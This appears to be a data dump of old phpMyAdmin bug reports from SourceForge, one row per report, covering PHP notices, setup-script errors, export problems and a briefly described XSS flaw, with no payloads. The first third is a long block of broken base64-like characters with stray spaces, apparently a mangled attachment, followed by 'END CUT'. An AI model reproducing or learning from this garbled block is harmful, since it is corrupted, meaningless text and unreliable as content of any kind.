WLaLAFPCEaWAFHHpH3OcAlp EWmmUmDj0ir3OAI47IN 9dbkzYiCNG3HEc SED4Y LYG0EkTAMuERA5xMdB5N2JLqJ9DvGiEHlXpIuYMY 4SEDkEX8FiPnEBQMin7hAY9RCBRMm 4j PUQstmDATN3iM6rJhIp94k0AUEO8TiEXEEx LfwsBe5Z4Cz BQpxm2FhBvGEgvCQgAEQZcYKB qCBBAyDWktDAGAlPgQsMRC2JMQDRSAIQQISIKwzEJuJ4A7GFRA A2B53fnkMQ YxFROJj9xEW8d0 WoTo1QICAgICAgICAgICXzIQsNlumr1AwJkhRLOdbiBAW8ACAdpCFgjQFnHiPE4s5sQSFiPQPJw4 nxPUseZbF7AYgraUExdygvjcfONiFmLQLuHEMk4s58QKFn3QCjlRxAkvJ1aywIRWzIkSTpRyYhUL Vfgu4MRSTlzIghe uHF4g4c0fDyk4VvGieWcWMGCHL5CThRxwsvCHr6VnCjmRAkLhPhKObGKE2Us NOLbwImNnKhjwRKfnxOXc6KehU98AU40cCLIAiq Rk40caKZhVh8IU60cKKVBV00xAknJ3JZGEaT OKGyeIwmc8LFCY1FaDQTJ9ycyGExG20 J I5UcCiOD4zJyycsLK4jlbGiUs5Uc4iPdpqTlRwYo0 9qNVJm2tTdq6qGd4rS40pP2VfuOincmZl7G4kVbFiWpO FgkSVvHiRpO1LLYkraeExs4sZFFm7Q6 Tvg5cTmLP2n1nAhwooFFpLQgI3yIExKLUflkTpg4obColc GCTsnVBbH8jk44eSEyiJbPhcnNE64 WazLl8OJXE7MYdEv36WcKOfEahYP0xROmDkxhxNzWahMs7FQmWbhhJUT8ziRxwJjmp0TKiccZwkh Lj8CAgICAgICX4FogcclHt0UEBAQEBAQEBAQEBAQEPiq 9e1Zwx14Y c6Ig9hUA LUguuEW39o5 R5DxTelwrvEl6bDd8H502JL 1eiwO91b0WFrxheiw3OmfRc6bE7 GnQ4J9Mb0GFbuveQw9p0WWE1 DVtNw3KlFaCK iQgICAgICAgICAgcC77 sy yGPnan5ssx hXAgXOVf fudlpnXvm Ru8 TT ts6f3meICRid99SggyEqkMrQ 9spXnqGHNHKAgICAgICAgICAgICM H b5jG 6 Cvx6P3X 8RrYx UV nuv fq t4Pp uTxMKcCc TJ80p592Jj95 j7NrL0 fEAjB m5qQw1eUtHu9IxBAQEBAQEBAQE BAQEBDJDkn4Qn9T3ooe0iObQfura5nK7HlO3qJ86b3Gudn7guNPR4rA6jqnb1GP2Nvs 26I2t 2I tdn6tuWAZY3lKfNuc675qLJF dx0l muX EUML0sXy8vl5 QdkmSNIY 8WRD9x3s9Y4ueL2Kr7Hi RtSD2lEfGtZRTTn4S2es0Ob2reGDsDNf40I 2HEIxdAO1IRGgO6BrRAUbEedkBK8iXE MqaNyIMc aAp tewMqcmLq4laTF D4vkaqwmBolMpqEHG5EsomBdXsLp w1YsmK xggDU7ZdUkBNXMONG1Amv QsaEP8uWkO Oy d9 GYhlsvXWH496odG6AdZyYcyMV6JjKkiIVaLi5068eByLI6vsVguKAZ1gVu5 HcyOgZo EJ2u7SfGm5ExNSbUuUCdBf7Vsc7w eR7c1jVofrmKG KahRBvSC2D4R9T4VqGKLjrwIV GtJyJljKwZ9jI99Uk9DzkUZpDwiryNi E OSBQT3U8H403i6RXFS8lINVWD6prgG2x n 2kEJO d8O2g4YG1uvZYgY9UarHR1J5UipLiA Fxd9cHX0fi MOAImxiNYcO pHUBjXMO1k12vYQ1tpxjK E NXYz2RGR1Aflz833xRfhSLv7C8d9XQQn4A6cZUuw3E756R Nq4 JePf doHoj3k 5zM6GxgHVE bBQaIQLUIIg qqAqlf2 MRlNiUVpUipO6KmK65mY vnfET3unDu4jmYyxoZByyDQUTLmBkFfCxpF A7CND2oxaDUTJYj2DJzSnjewvrVxfdHJL7ZgPc65V 08aBjXE O x6NhhI GCsOIWJ4QWhEX p33 jp HhV74wku HmFCa6CZ29FOMLwd hAWfQBMVoKnV1FlcR0540UaqSDHL9sPppw5MlWSin9Jl2ms JynTyQ r8sZ17Y3sPjEPdJyskQ xs9QGciQRJvlDE1T MiqZnu68SakwIXZFXOzW8 mnMj FstHJ mZ0BJ8bxgIMDkTdSdfSyllKBaRc9 qNj391kptx3tGwCW3F 2svHxPg7cHzSshl1A 75Tya54jvb 3iGSXc9gA0YW6Iem rDwzxxLG0 vOyyKq2mq OgVrObY7XQtkxNwCBp CM7uOyDhhhpCm4FbD9rK dL8XH2guRQsQZuSiy2G KHQYOgZwI SRfSxkqSJJxV PbEHXkpRyFky3qExYWxC3tiZvkli58tHH SkbjNRKD4dFHdHpgsPajvaxz5eNuy2pmPUlpr6xYhQ2OAn c0zF28 X3 uQPBa9Xfe wNWv4 VBf EfWgaBSUjJD2 f9WB2LVQRvdBXbupUK ia6GlN5OuHJaqT7NhJ798M71H02 VsXX9FzRTrqH3t5G cvaIzvDGxTKtfNot8FmiB6R5kTEVJkSZpxUVgIqJQCX2MNOKkTF5E8KUU9i1A84qMajv4ZkIM00r rJk0HD4JzkiYPK2w9UQQPW8XTnNTBIKkeBdMJ6gVRODrWA0sO8kdVxTqb2K8GsHFgP0iOb1cVSSl 8kQfR9MqCEFj9ELCF NRVAcKOsH2ifFBUGCamYKc Dj9ZFmygkxnlSDqQF3kojM8k9t2c1zB5tgd RDBf42MLJPVP UlyF kbQ2hy7BQKlBkpwJeZKOlwUSK0AhlTeVJ3m4HQarglqiXiSpExFSd1uBmI S67ZU9oIcOO IU8rtAaETozfDT3C4p7RNdtEPl6OB0c6sdM11AyuEOkvGKyKplHLz5Id5CaaNmEZ MqbSpLE5jcAWIqyHiZr2tChJnYj pEEjel97Sfut9lPtTu2Ado22S2vVfNpK7Weuate qCG1Sn3C bDzh85CZ4HzLse3Hdc6zI4J9RX1KfUR1aeuVBepdvW79n32Hnub TXbM7ZjtiO2UtsSm9P2qXXc 2m 90lpnfc7yC8u9llst9Dpj0SxfmK8zD5q3md9SXlCOK5crFcqFyn2m20z7TTmmk K78rDcLjfI L0qPSw9IldLF0twz9IMGCrmXnzqpQQdz4vsFZFXI7TZmTRpZH27GF662zz65fWFk TdthP7w 9 YdC4 zyg2jlteXffzjBfMOv31jycUvPjz rdqrH0Ubvu 2 ttT3eFGy90 N3GuhfezN 09Ov eMeVb9z64tEjzzymHQi1fOuC y9Z WzzB7tvO9x wFlX4J wYNV7w6katbZV2G0ryJr9lUY7Ssz 2leWNfvKjPZ5jfZ5s2af12jfCqN9K7Jm3wqjfdwXSbFRzz7zduq1623l7k2qsXp FqzVq9eZiz2k qakkSznrzBvJNevsKzDWZEHWKrHAWH YUSH1dz1laQkW30vHOsMm6zRPJoyxGE22GE22ZM1ki9Fk s9Fks9Fkc9ZMNhtNVowmK0aTlayZrBhNNhlNNhlNNmXNZJPRZNlosmw0Wc6aybLRZAnRF3N1ZzRk ZOUYz8s5WTsv5xjPy9jjMXYfLTu1jN0W UVCx8pKk OfkNK3nDkTy5KFxlSMxihZMwb7iC1Z0Sxn TTOOQbiyqBmlnHqIMbqhTaMKltTRLhlZJ1HSmZePuYnkYZiyF313waWXpbCYcbL4VJacypKkIlf9 FdX1mL0aoWdxOqAFtMAzR1xHfvfnTeI5lHMWeP4il4SzF6Er2DxaRBeea2bh vS5LZCzF7byUJCF RvuSpqqcaD1QPWw61kX2ihDah0ZRbsp2EEq4UAOZ84yiAKwHznr78lhwvp3YMQxWYC1XIRvagFpR HeTmoXWgq4dE2vvQJmLhMNqVwk9oyk ibyT7R4jlVNeQbt4jcRR0xgEfmYtMsydyc0lcf4DMXQVI 9LMbdKRa3U40RpGbRNJ3Ax0DiXi6YTGqhrwekHUV2kIs7Ef1xJ6d5DgWkdnqIdDQQ2bJ1hGtw2S HrCmDrTWsqmfKEij2yHWFni5g9QmzV8KtdZH5nHpNpbWC7IH2eQBPaZJ3byaHfoI7iVucuOYqPel KD03UTIfSXb8Mdj NTd83vjx7f5HGi bv9H1pItElvEt6GKyUy3aw4xtBOUxZvZgvPibN7 65IlB rfr2H350afjjyQV0KtxNpvzo5HoDlON7 9HcNfyjJ 5 f0nVkb cWf33ZOGFlJ9sYRibw0D1jo S973D93tgyv q bAz7yHXzI9tEGMXzF jeNXkvTjV5JlfG8E UcyY I4Qg4LehSpT7la8R4thw59 XP15TeCfSm55pGHb87mY1 sBfVKCX8dSH5Gg PqqN1pu trXg9c XDf6i63KHmsaacklG hDZ g6 S2fXf3y0qebB7ZPRxz 9Tc9MytKeRQ5FtuLvTeFhYYNGedIc2 vqlffU3Zh7z53FCz95iD6qhh I ykVGA5wImexwIzgFwLTKbgpxDTlwDXGxm99d 38N1r6U END CUT Original URL https sourceforge.net p phpmyadmin bugs 2358 https sourceforge.net p phpmyadmin bugs 2358 Original author tsrwebman Found in version 2.9.2","bug"
"24444","8723","Authentication fails when controluser pass is set.
I m using HTTP authentication and it appears I ve deleted the pma user from MySQL s privilege tables.
Now, every normal login fails, but it doesn t give any indication that it fails due to the pma user.
So it keeps reasking for the normal password, which is valid.
Original URL https sourceforge.net p phpmyadmin bugs 2359 https sourceforge.net p phpmyadmin bugs 2359 Original author olafvdspek","bug"
"24444","8724","Notice Undefined index charset of file.
When exporting to a file, the following PHP notice shows up Notice Undefined index charset of file in C \Program Files\Apache Software Foundation\Apache2.2\htdocs\phpmyadmin\libraries\export\sql.php on line 229 This is on PHP 5.2.1 on Windows with MySQL 5.0.27 community nt.
Export options Structure Add AUTO INCREMENT value Enclose table and field names with backquotes Data Complete inserts Extended inserts Use hexadecimal for binary fields Save as file No compression Original URL https sourceforge.net p phpmyadmin bugs 2360 https sourceforge.net p phpmyadmin bugs 2360 Original author olate Found in version 2.10.0 rc1","bug"
"24444","8725","Config script outputs line break after closing PHP tag..
The config.inc.php created by the config script has a superfluous line break output after the closing PHP tag ?
gt; This causes Headers cannot be modified... errors to be displayed, especially after a period of inactivity.
Original URL https sourceforge.net p phpmyadmin bugs 2361 https sourceforge.net p phpmyadmin bugs 2361 Original author laconicus Found in version 2.10.0 rc1","bug"
"24444","8726","querywindow loses url encoded characters.
querywindow loses url encoded characters when refreshing to reproduce bug go to sql type query SELECT 1 1 on result page klick edit to show sql querywindow FINE everything fine so far no activate result page again press edit again to show sql querywindow BUG querywindow shows wrong query SELECT 1 1 missing the plus) SOLUTION went to querywindow.php line 190 and deleted command urldecode.
did so in line 186 just in case Original URL https sourceforge.net p phpmyadmin bugs 2362 https sourceforge.net p phpmyadmin bugs 2362 Original author nullbarriere Found in version 2.9.2","bug"
"24444","8727","css height makes cfg TextareaRows useless.
in both darkblue orange and original css files the textarea height 8em fixes the texareas to this size the configuration var TextareaRows is therefore useless best fix woul be to switch to a local style height GLOBALS[ cfg ][ TextareaRows ] for textarea elements instead of using somewhat deprevated attribs rows and cols which are overruled by css Original URL https sourceforge.net p phpmyadmin bugs 2363 https sourceforge.net p phpmyadmin bugs 2363 Original author nullbarriere Found in version 2.9.2","bug"
"24444","8728","Undefined PHP SELF in server status.php.
Notice Undefined variable PHP SELF in www htdocs phpMyAdmin server status.php on line 266 Notice Undefined variable PHP SELF in www htdocs phpMyAdmin server status.php on line 281 ... i m using trunk phpMyAdmin php error reporting = E ALL PHP 4.4.5 dev cgi fcgi) built Nov 18 2006 18 20 08) i wonder what other info i need to write down here..
Original URL https sourceforge.net p phpmyadmin bugs 2364 https sourceforge.net p phpmyadmin bugs 2364 Original author xuefer Found in version Latest Git","bug"
"24444","8729","Cookie password delete on timeout inactivity.
If running it strictly; pma cookie password .
``serverxc2xb4xc2xb4 should be removed upon User inactive too long .
As of today this is only done if inactivity has been less than LoginCookieValidity 4, then by PMA auth fails ).
This is the case on version 2.9.0.2, but do not see any change in 2.10.0 rc1 Checked; File libraries auth cookie.auth.lib.php Revision 9966 Line 353 to 363 rest of file) Better safe than sorry.
Original URL https sourceforge.net p phpmyadmin bugs 2365 https sourceforge.net p phpmyadmin bugs 2365 Original author z0l0ft","bug"
"24444","8730","Undefined index sql query in common.lib.
after import of a complete db i get Notice Undefined index sql query in ...PmaQA 2 10 70223\libraries\common.lib.php on line 1189 Import has been successfully finished, 70 queries executed.
this should be fixed before pma 2.10.0 will be released ;) Original URL https sourceforge.net p phpmyadmin bugs 2366 https sourceforge.net p phpmyadmin bugs 2366 Original author windkiel Found in version 2.10.0 rc1","bug"
"24444","8731","HTML maxlength.
From Olaf van der Spek olafvdspek) Note also that there s a HTML length limit on fields like binary 20).
However, when you use unhex, you can use a value up to length 40.
HTML lenght limits also do silent truncation, which is undesirable.
Original URL https sourceforge.net p phpmyadmin bugs 2367 https sourceforge.net p phpmyadmin bugs 2367 Original author lem9","bug"
"24444","8732","pma designer coords in upgrade script.
Wondering, Should not pma designer coords table be checked created in scripts upgrade tables mysql 4 1 2 .sql ?
Original URL https sourceforge.net p phpmyadmin bugs 2368 https sourceforge.net p phpmyadmin bugs 2368 Original author z0l0ft Found in version 2.10.0 rc1","bug"
"24444","8733","JavaScript focus login Opera.
.
libraries auth cookie.auth.lib.php Line 240 250 The render element.focus ) wont work in Opera unless it is trigged by the onload event.
Attached, either in the lt;body gt; tag, or by the DOM.
Ie lt;script type= text javascript language= javascript gt; lt;!
[CDATA[ if top!=self)window.top.location.href=location; function input focus )\{ lt;?php echo default user!= ?
document.getElementById \ input password\ ).focus ); document.getElementById \ input username\ ).focus ); ; ?
gt; \} ]] gt; lt; script gt; lt;body onload= input focus ) gt; Tested with Opera Version 9.02 Build 8585 Platform Win32 System Windows XP Opera 9.02 Windows NT 5.1; U; en) Original URL https sourceforge.net p phpmyadmin bugs 2369 https sourceforge.net p phpmyadmin bugs 2369 Original author z0l0ft Found in version 2.10.0 rc1","bug"
"24444","8734","table export sql compatibility mode lost auto increment.
when exporting table structure from mysql5.0 and using sql compatibility mode 4.0 the field s auto increment property won t get exported Original URL https sourceforge.net p phpmyadmin bugs 2370 https sourceforge.net p phpmyadmin bugs 2370 Original author szinya Found in version 2.9.1","bug"
"24444","8735","Select Tables PDF Pages Tweak.
In version 2.9.2, when you focus the X or Y field in the Select Tables interface for modifying PDF pages, it also selects the checkbox for Delete.
This is 100 not useful as it requires you to deselect the checkbox before clicking the GO button.
If you are editing X or Y, it s pretty safe to say that you are not interested in deleting the table in question.
Original URL https sourceforge.net p phpmyadmin bugs 2371 https sourceforge.net p phpmyadmin bugs 2371 Original author memelab","bug"
"24444","8736","Import from a mysql generated db dump.
The Problem I whant to periodicaly make a backup of my database, for this purpose i use the command line mysql I ve also views in my database, because of this I use routines I ve created an export using mysql add drop database add drop table quote names routines hex blob databases xyz host localhost user xyz password xyz A reimport using the commandline of mysql linux 5.0.24a standard) runs without problems, but an import using phpMyAdmin 2.11.0 dev svn 10034) results in the following error message anexed).
If I make an export using phpMyAdmin it will save also my views and import them correctly without errors), but an import of the backup created with the mysql command line doesn t run.
Thanks Claudio SQL Befehl Dumping routines for database xyz DELIMITER; MySQL meldet Dokumentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near DELIMITER at line 1 Original URL https sourceforge.net p phpmyadmin bugs 2372 https sourceforge.net p phpmyadmin bugs 2372 Original author claudio thomas Found in version Latest Git","bug"
"24444","8737","move uploaded file error when php tmp dir same as pma tmp.
I encoutered a strange error today.
File uploads were not working.
I discovered that if the php tmp dir is the same as the pma tmp dir the call to move uploaded file ) for the upload file fails and causes a file cannot be read error.
it might be useful to put in a check for this either in the setup.php when creating the configuration), adding a separate error message for this OR if possible never tried it myself) access the files in the php tmp dir directly.
Original URL https sourceforge.net p phpmyadmin bugs 2373 https sourceforge.net p phpmyadmin bugs 2373 Original author eth8505 Found in version 2.10.0","bug"
"24444","8738","Setup script fails to output SSL parameter.
After a fresh install of phpMyAdmin 2.10.0 and running setup.php, the generated config.inc.php misses a parameter so that logins alway fail with Error 2026 SSL connection error .
The setup script generates [...] cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ extension ] = mysql ; cfg[ Servers ][ i][ connect type ] = socket ; cfg[ Servers ][ i][ compress ] = false; cfg[ Servers ][ i][ auth type ] = cookie ; [...] Only after adding the line cfg[ Servers ][ i][ compress ] = false; login succeeds.
For local socket connections, the setup script should generate the above config line.
See also https sourceforge.net forum forum.php?thread id=1683182 forum id=72909 https sourceforge.net forum message.php?msg id=4183269 Original URL https sourceforge.net p phpmyadmin bugs 2374 https sourceforge.net p phpmyadmin bugs 2374 Original author seichter Found in version 2.10.0","bug"
"24444","8739","Error when using client as table name.
Apache 2.0.53 Win32) PHP 5.2.1 I have a table called client in my database.
When I tried to join the client table using alias with any table SELECT FROM client c, asset a WHERE c.id=a.cid phpMyAdmin 2.9.2 produce a warning and query failed Warning Cannot modify header information headers already sent by output started at C \Apache\Apache2\htdocs\phpMyAdmin\libraries\header meta style.inc.php 27) in C \Apache\Apache2\htdocs\phpMyAdmin\libraries\common.lib.php on line 1154 Even when I run a query SELECT FROM client c the same warning produced by phpMyAdmin.
However, when you removed the alias or add the word AS client AS c), the query run normally as expected.
I tried to download and upgrade my phpMyAdmin to version 2.10.0.1, and the query still didn t run failed).
It didn t produce the warning, but didn t do anything.
Original URL https sourceforge.net p phpmyadmin bugs 2375 https sourceforge.net p phpmyadmin bugs 2375 Original author andim17 Found in version 2.10.0.1","bug"
"24444","8740","CVE 2006 1549 deep recursion crash.
PHP is affected by a deep recursion crash http www.php security.org MOPB MOPB 02 2007.html http cve.mitre.org cgi bin cvename.cgi?name=CVE 2006 1549 phpMyAdmin will try to limit recursion on arrays supplied by users, so to make it impossible use this as an attack Original URL https sourceforge.net p phpmyadmin bugs 2376 https sourceforge.net p phpmyadmin bugs 2376 Original author cybot tm","bug"
"24444","8741","Call to undefined function PMA removeCookie ).
After upgrade from a perfectly functioning 2.9.2 version to 2.10.0.1 themes are gone.
If I try http myserver phpMyAdmin 2.10.0.1 css phpmyadmin.css.php error log of apache shows [error] [client 192.168.1.254] PHP Fatal error Call to undefined function PMA removeCookie ) in mypath htdocs phpMyAdmin 2.10.0.1 libraries session.inc.php on line 35, System data PHP Version 5.1.6 Apache 2.2.2 Fedora) Packages I ve tried with identical results phpMyAdmin 2.10.0.1 all languages.tar.gz phpMyAdmin 2.10.0.1 english.tar.gz HEAD subversion version 10042 Original URL https sourceforge.net p phpmyadmin bugs 2377 https sourceforge.net p phpmyadmin bugs 2377 Original author bandini Found in version 2.10.0.1","bug"
"24444","8742","PDF export is too wide.
In phpmyadmin 2.10.0.2 when I use export as PDF, the columns are wider than in the previous version I was using, 2.9.1.1.
In some cases there is much more white space than needed.
This causes some data to wrap, in cases where it didn t before.
With the older version I could print my favorite report on a single page.
Now it takes two.
The problem happens consistently in 2.10.0.2 but never in 2.9.1.1, while running against the same data.
Original URL https sourceforge.net p phpmyadmin bugs 2378 https sourceforge.net p phpmyadmin bugs 2378 Original author charlie8743 Found in version 2.10.0.2","bug"
"24444","8743","Undefined offset 4 in sqlparser.lib.php 1674. last modified rev 10048 Notice Undefined offset 4 in path to phpMyAdmin libraries sqlparser.lib.php on line 1674 sql 1\.
SET a = ON 2\.
SET GLOBAL delay key write = ON etc Original URL https sourceforge.net p phpmyadmin bugs 2379 https sourceforge.net p phpmyadmin bugs 2379 Original author xuefer Found in version Latest Git","bug"
"24444","8744","Call to undef.
func.
PMA isSuperuser ).
on win2000 when I try and open the SQL popup query window i get Fatal error Call to undefined function PMA isSuperuser ) in ...\PmaTrunkSvn\querywindow.php on line 7 but not on cihar demo) Original URL https sourceforge.net p phpmyadmin bugs 2380 https sourceforge.net p phpmyadmin bugs 2380 Original author windkiel Found in version Latest Git","bug"
"24444","8745","Forgotten tabs disabling.
phpMyAdmin 2.10.
There was another logic in previous versions to disable tab menus, it s changed, and not veru clear for me now.
But let s go to code.
tbl links.inc.php From line 96 if table info num rows == 0) \{ tabs[ empty ][ warning ] = strTableIsEmpty; \} Changed to if table info num rows == 0) \{ tabs[ empty ][ link ] = ; \} This disables Empty tab if table is empty.
sentence sounds funny )) Now we do not need warning element because there will be no link, just lt;span gt;.
Further, the same done with another menu tabs that has to be disabled when table is empty.
From line 118 if table info num rows == 0 !
tbl is view) \{ tabs[ browse ][ warning ] = strTableIsEmpty; tabs[ search ][ warning ] = strTableIsEmpty; \} Changed to if table info num rows == 0 !
tbl is view) \{ tabs[ browse ][ link ] = ; tabs[ search ][ link ] = ; \} We disabled menu tabs, but it s functionality is still accessible from address bar using urls like this http localhost phpmyadmin tbl select.php?db=test table=table name May be we have to catch this kind of activity showing the error message?
What do you think?
Is it worth to do?
Original URL https sourceforge.net p phpmyadmin bugs 2381 https sourceforge.net p phpmyadmin bugs 2381 Original author hanut Found in version 2.10.0.2","bug"
"24444","8746","Update timestamp.
CREATE TABLE `z 2007 01 15 data` `user id` int 10) unsigned NOT NULL, `one` float unsigned NOT NULL, `two` float unsigned NOT NULL, `three` float unsigned NOT NULL, `total` float unsigned NOT NULL, `posted on` timestamp NOT NULL default CURRENT TIMESTAMP on update CURRENT TIMESTAMP, `pay` int 10) unsigned NOT NULL, PRIMARY KEY `user id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; Then 1) Click on Structure 2) Modify posted on field 3) Change Atributes to ; Uncheck Current Timestamp Default to 0000 00 00 00 00 00 4) Save SQL query ALTER TABLE `z 2007 01 15 data` CHANGE `posted on` `posted on` TIMESTAMP NOT NULL DEFAULT 0000 00 0000 00 00 MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 00 00 00 00 00 at line 1 Original URL https sourceforge.net p phpmyadmin bugs 2382 https sourceforge.net p phpmyadmin bugs 2382 Original author nymphonics Found in version 2.10.0.2","bug"
"24444","8747","no export with afm .
no export possible after searching for afm or afm whatever but possible with afm exportfiles all types) contain html source with an 1064 parse error, the generated query contains sometimes Array or SELECT WHERE statements) to repruduce CREATE TABLE `afmtest` `name` varchar 255) NOT NULL ) ENGINE=MyISAM DEFAULT CHARSET=utf8; INSERT INTO `afmtest` `name`) VALUES info afm test.tux ); in phpmyadmin search name like afm , klick on select all, then export Original URL https sourceforge.net p phpmyadmin bugs 2383 https sourceforge.net p phpmyadmin bugs 2383 Original author i am zim Found in version 2.10.0.2","bug"
"24444","8748","PmaAbsoluteUri wrongly corrected ssl proxy).
function checkPmaAbsoluteUri ) in Config.class.php is a routine that insanely triple checks the ADMIN input made in config.inc.php.
It strongly does not trust the ADMIN and overwrites the value made by the ADMIN in a way that it renders PMA useless.
This is the case if a SSL Proxy is used.
PMA thinks that the connection is HTTP and therefore changes an HTTPS starting PmaAbsoluteUri config value into the best guessed version by PMA.
First of all folks Please stop ignoring the USER input in this case user is ADMIN)!
This is a dis respect of your softwares user.
This is against all usability rules.
comments like these are very disappointing The URI is specified, however users do often specify this wrongly, so we try to fix this.
what are you doing here?
are you kidding?
my tip write documentation instead of coding wired workaround that lead to malfunction.
thanks.
Original URL https sourceforge.net p phpmyadmin bugs 2384 https sourceforge.net p phpmyadmin bugs 2384 Original author hakre","bug"
"24444","8749","pow int,int) causes overflow.
On PHP 4.4.6 HP UX seastar B.11.23 U ia64) apparently all calls to pow ) with integer values in common.lib.php cause an overflow for higher exp values of course) resulting in a display of 0.0 EiB for all byte size values the result of pow 10, 6) is zero f.e.)
Workaround is to specify the constant integer values as floats 10.0 instead of 10 f.e.)
In 2.10.0.2 common.lib.php this applies to lines 1516, 1517, 1522, 1524, 1607, 1608, 1613, 1614, 1621 and 1622.
Original URL https sourceforge.net p phpmyadmin bugs 2386 https sourceforge.net p phpmyadmin bugs 2386 Original author erik krause Found in version 2.10.0.2","bug"
"24444","8750","WWW Authenticate, charset problem.. Hi..
It seems that the text that are sent to the www auth is in the chosen charset.
But this is wrong since the RFC specifies that it should be in US ASCII.
For me I get this WWW Authenticate Basic realm= phpMyAdmin kxc3x83xc2xb6rs pxc3x83xc2xa5 localhost But it should be WWW Authenticate Basic realm= phpMyAdmin kxc3xb6rs pxc3xa5 localhost the topmost line is a UTF 8 string shown as Latin1 ISO 8859 1) Check here for the RFC http rfc.net rfc2616.html s2.2 The www auth stuff is in the rfc2617 Original URL https sourceforge.net p phpmyadmin bugs 2385 https sourceforge.net p phpmyadmin bugs 2385 Original author gonzzor Found in version 2.10.0.2","bug"
"24444","8751","ok2.11) insert results in row with empty fields, svn10074.
using Michals pma 2.11 trunk demo the result is INSERT INTO `test`.`sortTest` `danish` , `german2` , `utf general` , `utf unicode` ) VALUES , , , ); yes, i did put in some data ) ok in phpMyAdmin 2.10.0.2 demo Original URL https sourceforge.net p phpmyadmin bugs 2387 https sourceforge.net p phpmyadmin bugs 2387 Original author windkiel Found in version Latest Git","bug"
"24444","8752","Execute mysql statement over Internet connection.
I have tryied to launch mysql statements from distance and got the error s) import.php Missing parameter import type FAQ 2.8) import.php Missing parameter format FAQ 2.8) Try all the point in FAQ 2.8) and still not working, same errors.
Localy the issue is not present, only from distance over the internet connection).
Installation for win2k from the english zipped file.
return to phpMyAdmin 2.9.2 which is working properly Original URL https sourceforge.net p phpmyadmin bugs 2388 https sourceforge.net p phpmyadmin bugs 2388 Original author mecanicu Found in version 2.10.0.2","bug"
"24444","8753","1050 Table <table name> already exists.
phpmyadmin 2.10.0.2 although this bug has been here since version 2.7 i think, if not earlier) MySQL 4.1.19 community nt browser IE Opera Firefox whenever i try creating a new table in a database it says the table already exists.
which is not the case... i have an idea it has to do with cfg[ DefaultTabTable ] = sql.php ; when one clicks on the table in the left frame it displays records rather than table structure.
its the only thing i have out of the ordinary.
the problem happens when you click on the database name on the left frame then create new table .
my suspitions is that the sql.php page remebers what the last sql statement entered was.
in this case its create table.
so it tries to submit it again.
the table gets created in the first place though.
more an anoyance than anything else cause a fix is to just click on the newly created table in the left frame.
this happens EVER table i try create... Error SQL query CREATE TABLE `db regions` `ID` INT 3 ) NOT NULL AUTO INCREMENT PRIMARY KEY , `name` VARCHAR 75 ) NULL , `disabled` TINYINT 1 ) NULL DEFAULT 0 ) ENGINE = innodb; MySQL said 1050 Table db regions already exists Original URL https sourceforge.net p phpmyadmin bugs 2389 https sourceforge.net p phpmyadmin bugs 2389 Original author williamstam Found in version 2.10.0.2","bug"
"24444","8754","Stray space in Config.class.php.
In the windows zip distribution, there is a blank line at the end of the file libraries config.class.php Under IIS 6 with PHP 4.3.something don t ask, my client specifically requested it), the main login page to phpmyadmin generates header errors.
Removing the blank line fixes the problem.
Original URL https sourceforge.net p phpmyadmin bugs 2390 https sourceforge.net p phpmyadmin bugs 2390 Original author toppsoft Found in version 2.10.0.2","bug"
"24444","8755","XSS in PMA sanitize ).
PMA sanitize ) does not remove JavaScript from links Original URL https sourceforge.net p phpmyadmin bugs 2391 https sourceforge.net p phpmyadmin bugs 2391 Original author cybot tm Found in version 2.10.0.2","bug"
"24444","8756","unable to sort by column with without mysqli and new MySQL.
When clicking the column header to sort a query s results, the new query fails with no such column `column`.`column` instead of `table`.`column`).
In other words, the new sorted query is invalid.
Upgrading to using mysqli fixes the problem.
The problem seems to exist in PMA DBI get fields meta ).
The resulting fields meta hash has the column s name in the gt;table slot.
It can be worked around by changing the fields meta[n] gt;table references to table in display tbl.lib.php.
There may be a number of related errors that occur as well.
phpMyAdmin 2.10.0.2 Used PHP extensions mysql MySQL client version 5.0.22 Server version 5.0.22 log Protocol version 10 MySQL charset UTF 8 Unicode utf8) Original URL https sourceforge.net p phpmyadmin bugs 2396 https sourceforge.net p phpmyadmin bugs 2396 Original author jcore Found in version 2.10.0.2","bug"
"24444","8757","Cannot upgrade using upgrade.pl.
Greetingz, I recently tried to upgrade my PHPMyAdmin 2.9.0.1 using the following root firewall var www phpmyadmin scripts upgrade.pl phpmyadmin And it produced the following Local version 2.9.0.1) newer than latest stable release 2.10.0.2), not updating.
use force ) I know that this is caused by the way that Perl is interpreting the version numbers when you do that compare.
Another issue is that the upgrade file on your site http phpmyadmin.net home page version.php states the packages to download are http mirror sourceforge phpmyadmin phpMyAdmin 2.10.0.2 all languages.tar.gz and in the script it is looking for phpMyAdmin 2.10.0.2.tar.gz and therefore it fails to find the file after being downloaded.
I finally managed to upgrade after hacking a few things in the upgrade script.
PS.
I see this seems to be fixed in the latest version, I did an upgrade from 2.10.0.2 gt; 2.10.0.2 and it worked.
It would be good to note this somewhere incase someone else has this problem..
Thanks, Clifford.
Original URL https sourceforge.net p phpmyadmin bugs 2397 https sourceforge.net p phpmyadmin bugs 2397 Original author cliffordh nh Found in version 2.9.0.1","bug"
"24444","8758","2.10.02) Browse and SELECT fail with many fields.
I tried both 2.9.2 and 2.10.2 with the same results.
I have one table with 196 fields it seems I can no longer do a select from STUDDEMO within phpmyadmin.
Is there a limit on the number of fields that can now be displayed.
I do not recall running into this previously.
The url was http noodle.jesuitcp.org tools phpMyAdmin2102 sql.php?db=moodle18cvs table=STUDDEMO token=7b5799db0b118ef8b2af5f9d398e0c09 goto=tbl structure.php back=tbl structure.php pos=0 With the select if I limit the number of fields to 82 then the select seems to work.
My apologies if this is a duplicate, I searched for various browsing errors but I could not find anything that resembled this.
I am using MySQL 5.0.22, PHP 5.1.2, PHPMyAdmin 2.10.0.2.
I am attaching the table structure should that be helpful.
Original URL https sourceforge.net p phpmyadmin bugs 2392 https sourceforge.net p phpmyadmin bugs 2392 Original author arborrow Found in version 2.10.0.2","bug"
"24444","8759","Call to undefined PMA getUvaCondition ).
Fatal error Call to undefined function PMA getUvaCondition ) in usr share webapps phpmyadmin 2.10.0.2 htdocs tbl replace.php on line 101 error after editing a line and selecting edit next line in the dropdown field.
when i edit the same line and choose back it works.
